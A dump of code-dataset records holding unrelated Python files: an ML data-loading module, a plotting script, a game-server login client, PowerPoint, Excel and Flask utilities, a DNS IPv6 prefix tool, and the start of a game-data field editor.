torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize((mean,), (std,))])\n self.train_dataset = torchvision.datasets.FashionMNIST(self.data_path, train=True, download=True, transform = transform)\n self.val_dataset = torchvision.datasets.FashionMNIST(self.data_path, train=False, download=True, transform = transform)\n c_in, h_in, w_in, n_class = 1, 28, 28, 10\n task = \"classification\"\n classes = tuple(range(10))\n elif self.dataset_name == \"cifar10\" :\n #mean, std = [0.4914, 0.4822, 0.4465], [0.247, 0.2435, 0.2616]\n mean, std = [0.5, 0.5, 0.5], [0.5, 0.5, 0.5]\n train_transform = torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(mean=mean, std=std),\n # https://medium.com/mlearning-ai/cifar10-image-classification-in-pytorch-e5185176fbef\n #torchvision.transforms.RandomResizedCrop(224), # h_in = w_in = 224\n #torchvision.transforms.RandomCrop(32, padding=4, padding_mode='reflect'),\n #torchvision.transforms.RandomHorizontalFlip(p=0.5)\n ])\n transform = torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(mean=mean, std=std)])\n self.train_dataset = torchvision.datasets.CIFAR10(self.data_path, train=True, download=True, transform = train_transform)\n self.val_dataset = torchvision.datasets.CIFAR10(self.data_path, train=False, download=True, transform = transform)\n c_in, h_in, w_in, n_class = 3, 32, 32, 10\n task = \"classification\"\n classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')\n elif self.dataset_name == \"cifar100\" :\n #mean, std = [0.5071, 0.4865, 0.4409], [0.2673, 0.2564, 0.2762]\n mean, std = [0.5, 0.5, 0.5], [0.5, 0.5, 0.5]\n train_transform = torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(mean=mean, std=std),\n # https://medium.com/mlearning-ai/cifar10-image-classification-in-pytorch-e5185176fbef\n #torchvision.transforms.RandomResizedCrop(224), # h_in = w_in = 224\n #torchvision.transforms.RandomCrop(32, padding=4, padding_mode='reflect'),\n #torchvision.transforms.RandomHorizontalFlip(p=0.5)\n ])\n transform = torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(mean=mean, std=std)])\n self.train_dataset = torchvision.datasets.CIFAR10(self.data_path, train=True, download=True, transform = train_transform)\n self.val_dataset = torchvision.datasets.CIFAR10(self.data_path, train=False, download=True, transform = transform)\n c_in, h_in, w_in, n_class = 3, 32, 32, 100\n task = \"classification\"\n # TODO : https://www.cs.toronto.edu/~kriz/cifar.html\n classes = tuple(range(100))\n elif self.dataset_name == \"wine\" :\n # recognize the wine class given the features like the amount of alcohol, magnesium, phenol, color intensity, etc\n dataset = sk_dataset.load_wine()\n classes = tuple(dataset[\"target_names\"])\n c_in, n_class = 13, len(classes)\n task = \"classification\"\n elif self.dataset_name == \"boston\" :\n # houses in Boston like the crime rate, nitric oxides concentration, number of rooms, distances to employment centers, tax rates, etc. \n # The output feature is the median value of homes.\n dataset = sk_dataset.load_boston()\n c_in, n_class = 13, 1\n task = \"regression\"\n classes = None\n elif self.dataset_name == \"iris\" :\n # It contains sepal and petal lengths and widths for three classes of plants\n dataset = sk_dataset.load_iris()\n classes = tuple(dataset[\"target_names\"])\n c_in, n_class = 4, len(classes)\n task = \"classification\"\n elif self.dataset_name == \"diabete\" :\n # the diabetes dataset (regression)\n dataset = sk_dataset.load_diabetes()\n c_in, n_class = 10, 1\n task = \"regression\"\n classes = None\n elif self.dataset_name == \"digits\" :\n # Load and return the digits dataset (classification)\n dataset = sk_dataset.load_digits()\n classes = tuple(dataset[\"target_names\"])\n c_in, n_class = 64, len(classes)\n task = \"classification\"\n elif self.dataset_name == \"linnerud\" :\n # Load and return the physical exercise Linnerud dataset (regression)\n dataset = sk_dataset.load_linnerud()\n c_in, n_class = 3, 3\n task = \"regression\"\n classes = None\n elif \"arithmetic\" in self.dataset_name :\n #\"arithmetic,op=+,p=200,reg=False,mod=True,ijeqji=True\"\n s = self.dataset_name.split(\"arithmetic,\")[1].strip()\n s = str2dic(s)\n #assert 'p' in s.keys()\n op, p, reg, mod, ijeqji = s[\"op\"], int(s[\"p\"]), bool_flag(s[\"reg\"]), bool_flag(s[\"reg\"]), bool_flag(s[\"ijeqji\"])\n tmp = {\"p\" : p, \"regression\" : reg, \"operator\" : op, \"ij_equal_ji\" : ijeqji, \"modular\" : mod}\n #x, y = get_arithmetic_set(p, regression=reg, operator=op, ij_equal_ji = ijeqji, modular = mod)\n x, y = get_arithmetic_set(**tmp)\n self.train_dataset, self.val_dataset = get_dataloader(\n x, y,\n train_pct=self.train_pct, \n num_workers=self.num_workers\n )\n n_class = 2*(p-1)+1 if op == \"+\" else (p-1)**2+1\n n_class = p if mod else n_class\n n_class = 1 if reg else n_class\n if reg :\n classes = None\n task = \"regression\" if reg else \"classification\"\n else :\n classes = tuple(range(n_class))\n task = \"regression\" if reg else \"classification\"\n c_in = 0\n elif self.dataset_name == \"multi_scale_feature\" :\n c_in, n_class = 100, 1\n task = \"regression\"\n classes = None\n \n train_size, val_size = 150, 1000\n k = [50, 100000]\n self.train_dataset, self.val_dataset = get_dataloader_msf(\n train_size, val_size, \n d=c_in, k=k, noise = 0.0, seed = 100, \n task = task,\n )\n elif \"scm\" in self.dataset_name:\n g_dic = {\n \"id\" : id,\n 'relu' : F.relu,\n 'tanh' : F.tanh,\n \"sigmoid\" : sigmoidal,\n }\n #\"scm,N=784,M=4,fixed_w=False,scm=False,g=id,noise=0.0,out_dim=1\"\n s = self.dataset_name.split(\"scm,\")[1].strip()\n s = str2dic(s)\n N, M, fixed_w, scm, g = int(s[\"N\"]), int(s[\"M\"]), bool_flag(s[\"fixed_w\"]), bool_flag(s[\"scm\"]), s[\"g\"] \n noise, out_dim = float(s.get(\"noise\", 0.0)), int(s.get(\"out_dim\", 1))\n g = g_dic[g]\n tmp = {\"N\" : N, \"M\" : M, \"fixed_w\" : fixed_w, \"scm\" : scm, \"g\" : g, \"out_dim\": out_dim}\n c_in, n_class = N, out_dim\n task = \"regression\"\n classes = None\n \n train_size, val_size = 150, 1000\n k = [1, 50, 100000]\n k = None\n self.train_dataset, self.val_dataset = get_dataloader_scm(\n train_size, val_size, \n N=N, M=M, out_dim=out_dim, g=g, \n mu_x = 0.0, sigma_x = 1.0, # data\n mu_w = 0.0, sigma_w = 1.0, # feature map\n mu_v = 0.0, sigma_v = 1.0, # output layer\n mu_noise = 1.0, sigma_noise = noise, # noise\n k=k, seed = 100, task = task,\n )\n else :\n # TODO : https://scikit-learn.org/stable/datasets/real_world.html\n raise Exception(\"Unknown dataset : %s\" % self.dataset_name)\n\n if self.dataset_name in SKLEAN_SET :\n x = dataset[\"data\"]\n # Scale data to have mean 0 and variance 1 \n # which is importance for convergence of the neural network\n scaler = StandardScaler()\n x = scaler.fit_transform(x)\n\n y = torch.from_numpy(dataset[\"target\"])\n if task == \"regression\" : y = y.float()\n else : y = y.long()\n\n self.train_dataset, self.val_dataset = get_dataloader(\n torch.from_numpy(x).float(), y,\n train_pct=self.train_pct, \n num_workers=self.num_workers\n )\n\n cond = (self.dataset_name not in SKLEAN_SET) and (\"arithmetic\" not in self.dataset_name) \n if cond and (0 < self.train_pct < 100) :\n self.train_dataset = cut_dataset(self.train_dataset, pct=self.train_pct)\n if 0 < self.val_pct < 100 :\n self.val_dataset = cut_dataset(self.val_dataset, pct=self.val_pct)\n\n self.train_dataset = DatasetWithIndexes(self.train_dataset)\n self.val_dataset = DatasetWithIndexes(self.val_dataset)\n\n train_size = len(self.train_dataset)\n val_size = len(self.val_dataset)\n self.train_batch_size = min(self.train_batch_size, train_size)\n self.val_batch_size = min(self.val_batch_size, val_size)\n self.data_infos = {\n \"c_in\" : c_in, \"h_in\" : h_in, \"w_in\" : w_in, \"n_class\" : n_class,\n \"classes\" : classes, \"task\" : task,\n \"train_batch_size\" : self.train_batch_size, \"val_batch_size\" : self.val_batch_size, \n \"train_size\":train_size, \"val_size\":val_size, \"size\" : train_size + val_size,\n \"train_n_batchs\":len(self.train_dataloader()), \"val_n_batchs\":len(self.val_dataloader())\n }\n for k, v in tmp.items() : self.data_infos[k] = v\n\n logger.info(self.data_infos)\n for k, v in self.data_infos.items() : logger.info(str(k) + \" --> \" + str(v))\n\n if self.use_sampler :\n weights = torch.ones(train_size) / train_size \n num_samples = train_size\n #num_samples = math.ceil(train_size / self.train_batch_size) * max_epochs\n self.sampler = WeightedRandomSampler(weights = weights, num_samples=num_samples, replacement=True, generator=None)\n #self.sampler = RandomSampler(data_source=self.train_dataset, replacement=True, num_samples=num_samples, generator=None)\n\n def train_dataloader(self) -> Union[DataLoader, List[DataLoader], Dict[str, DataLoader]]:\n return DataLoader(\n self.train_dataset,\n batch_size=self.train_batch_size,\n num_workers=self.num_workers,\n shuffle=not self.use_sampler,\n sampler=self.sampler\n )\n\n def val_dataloader(self) -> Union[DataLoader, List[DataLoader]]:\n return DataLoader(\n self.val_dataset,\n batch_size=self.val_batch_size,\n num_workers=self.num_workers,\n )\n\n def test_dataloader(self) -> Union[DataLoader, List[DataLoader]]:\n return DataLoader(\n self.val_dataset,\n batch_size=self.val_batch_size,\n num_workers=self.num_workers,\n )\n\n\nif __name__ == \"__main__\":\n\n data_module = LMLightningDataModule(\n dataset_name = \"mnist\",\n train_batch_size = 512,\n val_batch_size = 1000,\n num_workers = 0,\n \n )\n print(data_module.data_infos)\n \n x, y = next(iter(data_module.train_dataloader()))\n print(x.shape, y.shape)","repo_name":"Tikquuss/sag_torch","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":18050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26779437774","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\n# PATH = '/home/dchipping/project/dan-track/ahm-agent/results/policies/train-results/41c8d3f3-c23e/2022-09-09T15-58-23/PPO_motgym:JDE_Mot17SequentialEnv-v0_e0754_00000_0_2022-09-09_15-58-34/progress.csv'\nPATH = '/home/dchipping/project/dan-track/ahm-agent/results/a256cb6c-3d5f/2022-09-11T00-05-54/PPO_motgym:JDE_Mot17SequentialEnv-v0_2dd5c_00000_0_2022-09-11_00-06-19/progress.csv'\n\ndf = pd.read_csv(PATH)\neps = df['episodes_total']\nrwd = df['episode_reward_mean']\n\nwith plt.style.context('ggplot'):\n plt.plot(eps, rwd)\n # plt.title('Mean Episode Reward')\n plt.xlabel('Episodes')\n plt.ylabel('Episode Reward')\n plt.show()","repo_name":"dchipping/lahm-track","sub_path":"tools/graphing.py","file_name":"graphing.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30953863165","text":"import socket\nimport io\nimport json\n\nfrom net import *\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef cog_jp_login(username, password):\n url_base = 'https://www.capcom-onlinegames.jp/auth/launcher/'\n\n # Startup session and get cookies from the start page.\n sess = requests.Session()\n sess.get(url_base + 'start.html?q=711')\n\n # Post our login request\n data = {\n 'id':username,\n 'pw':password,\n 'svid': 1000,\n 'lifetime': 60,\n 'fromURL': 'http://cog-members.mhf-z.jp',\n }\n resp = sess.post(url_base + 'login', data=data)\n\n # Parse the result.\n s = BeautifulSoup(resp.content, features='html.parser')\n login_result = json.loads(s.select('input')[0].get('value'))\n if login_result['code'] != '000':\n raise Exception('Error on cog jp login')\n\n return login_result['skey']\n\ndef cog_jp_serverlist_get_first():\n resp = requests.get('http://srv-mhf.capcom-networks.jp/serverlist.xml')\n s = BeautifulSoup(resp.content, features='html.parser')\n for item in s.select('server_groups > group'):\n if item.get('ip') != \"\" and item.get('port') != 0:\n return (item.get('ip'), item.get('port'))\n\n\ndef cog_jp_signin(host, port, username, skey):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((host, port))\n\n # 8 NULL bytes to init the connection.\n sock.sendall(bytearray(8))\n\n ps = PacketStreamContext(SocketFileWrapper(sock))\n\n # Build the signin packet data.\n body = SignInRequest.build(dict(\n req_type='DLTSKEYSIGN:100',\n id=username,\n skey=skey,\n unk=''\n ))\n\n\n # Send the packet.\n ps.make_and_send_packet(body)\n\n # Get the response and parse it.\n pkt = ps.read_packet()\n \n return SignInResp.parse(pkt.data)\n\ndef cog_jp_read_entrance_server_list(host, port):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect((host, port))\n\n # 8 NULL bytes to init the connection.\n sock.sendall(bytearray(8))\n\n # Encrypted packet with 'ALL+\\x00' body.\n ps = PacketStreamContext(SocketFileWrapper(sock))\n ps.make_and_send_packet(b'ALL+\\x00')\n\n # Read the response\n pkt = ps.read_packet()\n\n # Read the two binary8 parts.\n stream = io.BytesIO(pkt.data)\n (server_info_header, server_info_bytes) = read_binary8_part(stream)\n (user_info_header, user_info_bytes) = read_binary8_part(stream)\n stream.close()\n\n # Start parsing the server info.\n si_size = ServerInfo.sizeof()\n ci_size = ChannelInfo.sizeof()\n si_stream = io.BytesIO(server_info_bytes)\n # Loop over the server info structs.\n #print(server_info_header)\n\n servers = []\n for i in range(server_info_header.entry_count):\n si = ServerInfo.parse(si_stream.read(si_size))\n\n # Loop over the channel info structs.\n #print(\"server #{}\".format(i))\n #print(si)\n #print(si.unk_str.decode('shift_jis'))\n channels = []\n for j in range(si.channel_count):\n #print(\"channel #{}\".format(j))\n ci = ChannelInfo.parse(si_stream.read(ci_size))\n channels.append(ci)\n #print(ci)\n\n servers.append((si, channels))\n\n return (servers, ps)","repo_name":"Future-of-Frontier/mhf-fake-client","sub_path":"jp.py","file_name":"jp.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16553244160","text":"from collections.abc import Container\nfrom pptx import Presentation\nfrom pptx.util import Inches\nfrom pptx.dml.color import RGBColor\n\nclass PPTGenerator:\n def __init__(self, contents) -> None:\n self.contents = contents\n\n def addTitleSlide(self, prs: Presentation) -> None:\n title_slide_layout = prs.slide_layouts[0]\n slide = prs.slides.add_slide(title_slide_layout)\n title = slide.shapes.title\n title.text = self.contents['heading']\n title.text_frame.paragraphs[0].runs[0].font.color.rgb = RGBColor( 88, 24, 69 ) # Red color\n prs.save(self.contents[\"Presentation Name\"])\n\n def addTableOfContents(self, prs: Presentation) -> None:\n slide_layout = prs.slide_layouts[1]\n slide = prs.slides.add_slide(slide_layout)\n title_shape = slide.shapes.title\n title_shape.text = \"Contents\"\n title_shape.text_frame.paragraphs[0].runs[0].font.color.rgb = RGBColor( 88, 24, 69 ) # Red color\n bullet_points = slide.shapes.placeholders[1]\n\n for subheading_dict in self.contents[\"subheadings\"]:\n subheading = subheading_dict[\"subheading\"]\n text_frame = bullet_points.text_frame\n p = text_frame.add_paragraph()\n p.text = subheading\n p.level = 0\n p.runs[0].font.color.rgb = RGBColor( 88, 24, 69 ) # Blue color\n\n prs.save(self.contents[\"Presentation Name\"])\n\n def addTopicExplanation(self, prs: Presentation) -> None:\n slide_layout = prs.slide_layouts[1]\n\n for subheading_dict in self.contents[\"subheadings\"]:\n subheading = subheading_dict[\"subheading\"]\n content = subheading_dict[\"content\"]\n\n slide = prs.slides.add_slide(slide_layout)\n title_shape = slide.shapes.title\n title_shape.text = subheading\n title_shape.text_frame.paragraphs[0].runs[0].font.color.rgb = RGBColor( 88, 24, 69 ) # Red color\n bullet_points = slide.shapes.placeholders[1]\n\n for explanation in content:\n text_frame = bullet_points.text_frame\n p = text_frame.add_paragraph()\n p.text = explanation\n p.level = 0\n p.runs[0].font.color.rgb = RGBColor(0, 0, 255) # Blue color\n\n prs.save(self.contents[\"Presentation Name\"])\n\n\nif __name__ == \"__main__\":\n import json\n\n # Load contents from the JSON file\n with open(\"static/1.json\", \"r\") as file:\n content = json.load(file)\n\n newContent = {\n \"Presentation Name\": \"static/Sample.pptx\",\n \"heading\": content[\"heading\"],\n \"subheadings\": content[\"subheadings\"]\n }\n\n MyPptGenerator = PPTGenerator(contents=newContent)\n prs = Presentation()\n MyPptGenerator.addTitleSlide(prs)\n MyPptGenerator.addTableOfContents(prs)\n MyPptGenerator.addTopicExplanation(prs)","repo_name":"shubpotadar/slidewizard","sub_path":"ppt.py","file_name":"ppt.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12295014509","text":"from PyQt5.QtWidgets import *\nimport sys\nimport openpyxl\n\n\nclass Main(QWidget):\n def __init__(self):\n super(Main,self).__init__()\n self.setWindowTitle(\"Load Excel data to QtableWidget\")\n\n layout = QVBoxLayout()\n self.setLayout(layout)\n\n self.table_Widget = QTableWidget()\n layout.addWidget(self.table_Widget)\n\n self.load_data()\n\n\n def load_data(self):\n path = \"list-countries-world.xlsx\"\n workbook = openpyxl.load_workbook(path)\n sheet = workbook.active #refer to active sheet in my excel cuz excel file have one or tow sheets he pick the active one\n\n self.table_Widget.setRowCount(sheet.max_row)\n self.table_Widget.setColumnCount(sheet.max_column)\n\n values = list(sheet.values) # values get me all differnet values in sheet (list of tuples with my values)\n for value in values:\n print(value) # sample of o/p :\n ''''# ('Rank', 'Country ', 'Population', '% of world pop.')\n (0, 'World', 7135000000, 1)\n (1, 'China', 1362010000, 0.191)\n (2, 'India', 1238570000, 0.174)\n (3, 'United States', 317400000, 0.0445)'''\n\n self.table_Widget.setHorizontalHeaderLabels(values[0]) # load data into Qtable widget but notice to set Rows and column count\n ## we added the header 4 columns with titles and all rows in sheet but all are empty\n ## we need to populate the tabel\n\n #self.table_Widget.setItem(0,2,QTableWidgetItem(\"Hello\")) added hello at first row(1) column 3 (population here)\n row_index=0\n for value_tuple in values[1:]: #started from 1 so he dont take header columns with labels\n col_index=0\n for value in value_tuple:\n self.table_Widget.setItem(row_index,col_index,QTableWidgetItem(str(value)))\n col_index +=1\n\n row_index +=1\n # hy5osh 3ala kol row y7ot data fe kol col 5als awl col y2om yzwd l7ad ma y5ls cols bta3t row kolo ba3den\n # yro7 3ala tany row y5ls cols feh w hakaza\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window = Main() ## Window variable with instance of main class\n window.showMaximized()\n app.exec_()","repo_name":"Abdallah-Salama2/Python-GUI-Projects-for-beginners","sub_path":"Execl Viewer (pyqt5)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43982767967","text":"#! /usr/bin/env python3\n\nimport argparse\nimport ipaddress\nimport socket\n\nfrom jfscripts import __version__\n\n\ndef get_ipv6(dns_name):\n result = socket.getaddrinfo(dns_name, port=None)\n\n for entry in result:\n #\n # entry:\n #\n # (family, type, proto, canonname, sockaddr)\n #\n # (\n # ,\n # ,\n # 0,\n # '',\n # ('2003:68:4c06:3300:1e98:ecff:fe0f:d330', 0, 0, 0)\n # )\n if entry[0] == 10 and entry[2] == 0:\n return entry[4][0]\n\n\ndef get_parser():\n \"\"\"The argument parser for the command line interface.\n\n :return: A ArgumentParser object.\n :rtype: argparse.ArgumentParser\n \"\"\"\n parser = argparse.ArgumentParser(description=\"Get the ipv6 prefix from a DNS name.\")\n\n parser.add_argument(\n \"dnsname\",\n help=\"The DNS name, e. g. josef-friedrich.de\",\n )\n\n parser.add_argument(\n \"-V\",\n \"--version\",\n action=\"version\",\n version=\"%(prog)s {version}\".format(version=__version__),\n )\n\n return parser\n\n\ndef main():\n args = get_parser().parse_args()\n\n ipv6 = get_ipv6(args.dnsname)\n\n prefix = ipaddress.ip_network(ipv6 + \"/64\", strict=False)\n\n print(prefix)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Josef-Friedrich/jfscripts","sub_path":"jfscripts/dns_ipv6_prefix.py","file_name":"dns_ipv6_prefix.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23560847490","text":"\"\"\"\nЗадание №1\nСоздать страницу, на которой будет кнопка \"Нажми меня\", при\nнажатии на которую будет переход на другую страницу с\nприветствием пользователя по имени.\n\nЗадание №2\nСоздать страницу, на которой будет изображение и ссылка\nна другую страницу, на которой будет отображаться форма\nдля загрузки изображений.\n\"\"\"\nfrom pathlib import PurePath, Path\nfrom flask import Flask, render_template, redirect, url_for, request\nfrom werkzeug.utils import secure_filename\n\napp = Flask(__name__)\n\n\n@app.route('/hi/')\ndef hi(name):\n return render_template('hi.html', name=name)\n\n\n@app.get('/btn/')\ndef get_touch_me():\n return render_template('form.html')\n\n\n@app.post('/btn/')\ndef post_touch_me():\n name = request.form.get('name')\n return redirect(url_for('hi', name=name))\n\n\n# @app.route('/image/')\n@app.route('/image/')\ndef image(file_name):\n image_path = PurePath.joinpath(Path.cwd(), 'static', 'uploads', file_name)\n print(image_path)\n return render_template('image.html', file_name=image_path)\n\n\n@app.get('/image_load/')\ndef get_image_load():\n return render_template('image_load.html')\n\n\n@app.post('/image_load/')\ndef post_image_load():\n file = request.files.get('file')\n file_name = secure_filename(file.filename)\n image_path = PurePath.joinpath(Path.cwd(), 'static', 'uploads', file_name)\n file.save(image_path)\n return redirect(f'image.html/{file_name}')\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"accountAirat/FlaskFastAPI","sub_path":"seminar/seminar2/app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16291525892","text":"# File: Reducible.py\r\n\r\n# Description: This program is designed to find the longest word that could be a word \r\n# for any length, if the word was reduced by a letter at a time.\r\n\r\n# Student Name: Michael Pham\r\n\r\n# Student UT EID: mp46987\r\n\r\n# Partner Name:\r\n\r\n# Partner UT EID:\r\n\r\n# Course Name: CS 313E\r\n\r\n# Unique Number: 51125\r\n\r\n# Date Created: 3/21/22\r\n\r\n# Date Last Modified: 3/22/22\r\n \r\nimport sys\r\n\r\n# Input: takes as input a positive integer n\r\n# Output: returns True if n is prime and False otherwise\r\ndef is_prime ( n ):\r\n if (n == 1):\r\n return False\r\n\r\n limit = int (n ** 0.5) + 1\r\n div = 2\r\n while (div < limit):\r\n if (n % div == 0):\r\n return False\r\n div += 1\r\n return True\r\n\r\n# Input: takes as input a string in lower case and the size\r\n# of the hash table \r\n# Output: returns the index the string will hash into\r\ndef hash_word (s, size):\r\n hash_location = 0\r\n for x in range (len(s)):\r\n letter = ord (s[x]) - 96\r\n hash_location = (hash_location * 26 + letter) % size\r\n return hash_location\r\n\r\n# Input: takes as input a string in lower case and the constant\r\n# for double hashing \r\n# Output: returns the step size for that string \r\ndef step_size (s, const):\r\n return const - (hash_word(s, const))\r\n\r\n# Input: takes as input a string and a hash table \r\n# Output: no output; the function enters the string in the hash table, \r\n# it resolves collisions by double hashing\r\ndef insert_word (s, hash_table):\r\n \r\n index = hash_word(s, len(hash_table))\r\n if hash_table[index] == '':\r\n hash_table[index] = s\r\n else:\r\n #Establishing group for moving the index if filled\r\n group = 1\r\n step = step_size(s, 7)\r\n destination_index = (index + group * step) % len(hash_table)\r\n while (hash_table[destination_index]):\r\n #Run the while loop until we find an index that is not filled up\r\n destination_index = (index + group * step) % len(hash_table)\r\n group += 1\r\n #Establish the index\r\n hash_table[destination_index] = s\r\n \r\n \r\n# Input: takes as input a string and a hash table \r\n# Output: returns True if the string is in the hash table \r\n# and False otherwise\r\ndef find_word (s, hash_table):\r\n \r\n index = hash_word(s, len(hash_table))\r\n if hash_table[index] == s:\r\n return True\r\n else:\r\n #Establishing group for moving the index if filled\r\n group = 1\r\n step = step_size(s, 7)\r\n destination_index = (index + group * step) % len(hash_table)\r\n while (hash_table[destination_index] and hash_table[destination_index] != s):\r\n #Run the while loop until we find an index that is not filled up\r\n destination_index = (index + group * step) % len(hash_table)\r\n group += 1\r\n #Establish the index\r\n if hash_table[destination_index] == s:\r\n #Return if the hash table equals the index needed\r\n return True\r\n else:\r\n #False if not\r\n return False\r\n\r\n# Input: string s, a hash table, and a hash_memo \r\n# recursively finds if the string is reducible\r\n# Output: if the string is reducible it enters it into the hash memo \r\n# and returns True and False otherwise\r\ndef is_reducible (s, hash_table, hash_memo):\r\n\r\n #Establish a false off the bat assuming that the word is not reducible before we run our test\r\n reducible = False\r\n if len(s) == 1:\r\n if s == 'i' or s == 'o' or s == 'a':\r\n if find_word(s, hash_memo) is False:\r\n #If not placed in the hash memo yet do so here\r\n insert_word(s, hash_memo)\r\n return True\r\n if find_word(s, hash_memo) == True:\r\n #If runs through test then return True\r\n return True\r\n else:\r\n for x in already_reduced(s):\r\n if x != 'i' and x != 'o' and x != 'a' and find_word(x, hash_table) == False:\r\n continue\r\n elif is_reducible(x, hash_table, hash_memo) is True:\r\n if find_word(s, hash_memo) is False:\r\n insert_word(s, hash_memo)\r\n #Set new reducible value here\r\n reducible = True\r\n return reducible \r\n\r\n \r\ndef already_reduced(s):\r\n \r\n #Establish the already reduced list for the function\r\n reduced = []\r\n for x in range(len(s)):\r\n #Attaching the word together\r\n reduced.append(s[:x] + s[x + 1:]) \r\n return reduced\r\n\r\n\r\n# Input: string_list a list of words\r\n# Output: returns a list of words that have the maximum length\r\ndef get_longest_words (string_list):\r\n\r\n longest_word = 0\r\n #Create list\r\n longest_word_list = []\r\n for x in range(len(string_list)):\r\n addition = string_list[x]\r\n #Checking the next string in the list \r\n checklength = len(addition)\r\n \r\n if checklength == longest_word:\r\n #Append if it is the longest word we have \r\n longest_word_list.append(addition)\r\n elif checklength < longest_word:\r\n #Just continue because it does not matter to us if we are not dealing with longest word\r\n continue \r\n elif checklength > longest_word:\r\n for y in range(len(longest_word_list)):\r\n longest_word_list.pop(0)\r\n #Remove to clear out the longest word list\r\n longest_word_list.append(addition)\r\n #Append if the word is longer than the current longest word \r\n longest_word = checklength\r\n return longest_word_list\r\n\r\n\r\n \r\n\r\ndef main():\r\n # create an empty word_list\r\n word_list = []\r\n # read words from words.txt and append to word_list\r\n #x = open('words.txt', 'r')\r\n #for line in x:\r\n #line = line.strip()\r\n for line in sys.stdin:\r\n line = line.strip() \r\n word_list.append (line)\r\n\r\n # find length of word_list\r\n length_list = len(word_list)\r\n\r\n # determine prime number N that is greater than twice\r\n # the length of the word_list\r\n greater_prime = length_list * 2 + 1\r\n while not is_prime(greater_prime):\r\n greater_prime += 2\r\n\r\n # create an empty hash_list\r\n hash_list = []\r\n\r\n # populate the hash_list with N blank strings\r\n for x in range(greater_prime):\r\n hash_list.append(\"\")\r\n\r\n # hash each word in word_list into hash_list\r\n # for collisions use double hashing \r\n for x in word_list:\r\n insert_word(x, hash_list)\r\n \r\n # create an empty hash_memo of size M\r\n # we do not know a priori how many words will be reducible\r\n # let us assume it is 10 percent (fairly safe) of the words\r\n # then M is a prime number that is slightly greater than \r\n # 0.2 * size of word_list\r\n hash_memo = []\r\n M = int(length_list * 0.2)\r\n while not(is_prime(M)):\r\n M += 1\r\n \r\n # populate the hash_memo with M blank strings\r\n hash_memo = ['' for x in range(M)]\r\n\r\n insert_word('i', hash_memo)\r\n insert_word('o', hash_memo)\r\n insert_word('a', hash_memo)\r\n \r\n # create an empty list reducible_words\r\n reducible_words = []\r\n\r\n # for each word in the word_list recursively determine\r\n # if it is reducible, if it is, add it to reducible_words\r\n # as you recursively remove one letter at a time check\r\n # first if the sub-word exists in the hash_memo. if it does\r\n # then the word is reducible and you do not have to test\r\n # any further. add \"the word to\" the hash_m\"emo.\r\n reducible_words = [x for x in word_list if is_reducible(x, hash_list, hash_memo) is True]\r\n \r\n # find the largest reducible words in reducible_words\r\n largest_reducible = get_longest_words(reducible_words)\r\n\r\n # print the reducible words in alphabetical order\r\n largest_reducible.sort()\r\n \r\n '''import time\r\n start = time.time()\r\n finish = time.time()\r\n print(\"Time: \" + str(finish - start))'''\r\n # one word per line\r\n for x in largest_reducible:\r\n print(x)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"michaelpham995/Data-Structures","sub_path":"Reducible.py","file_name":"Reducible.py","file_ext":"py","file_size_in_byte":7951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9120892360","text":"from __future__ import annotations\n\n__all__ = [\"BaseFieldEditor\", \"FieldRow\"]\n\nimport abc\nimport logging\nimport typing as tp\nfrom ast import literal_eval\nfrom enum import IntEnum\n\nfrom soulstruct.exceptions import InvalidFieldValueError\nfrom soulstruct.base.game_types import BaseGameObject, GameObjectSequence, MapEntry, BaseParam\nfrom soulstruct.base.project.editors.base_editor import BaseEditor\nfrom soulstruct.base.project.links import WindowLinker\nfrom soulstruct.base.project.utilities import bind_events, NumberEditBox\nfrom soulstruct.utilities.text import camel_case_to_spaces\nfrom soulstruct.utilities.window import ToolTip\n\nif tp.TYPE_CHECKING:\n from soulstruct.base.project.core import GameDirectoryProject\n\n_LOGGER = logging.getLogger(__name__)\n\n\nFieldTypeTyping = tp.Union[tp.Type[BaseGameObject], tp.Type[GameObjectSequence], type, tp.Iterable]\n\n\nclass FieldRow:\n \"\"\"Container/manager for widgets in a single field row in the Editor.\n\n These are only created once, and their contents are refreshed when needed (e.g. when a new entry is selected).\n Unlike entries, field value widgets may be Labels (which turn into Entries for editing), Checkbuttons, or\n Comboboxes. Each of these widgets is created for each row, so they can be hidden/dispalyed when needed by a\n given field type, rather than dynamically creating and destroying them every time a new entry/category is\n selected.\n \"\"\"\n\n CAMEL_CASE_NICKNAMES = True\n\n def __init__(self, editor: 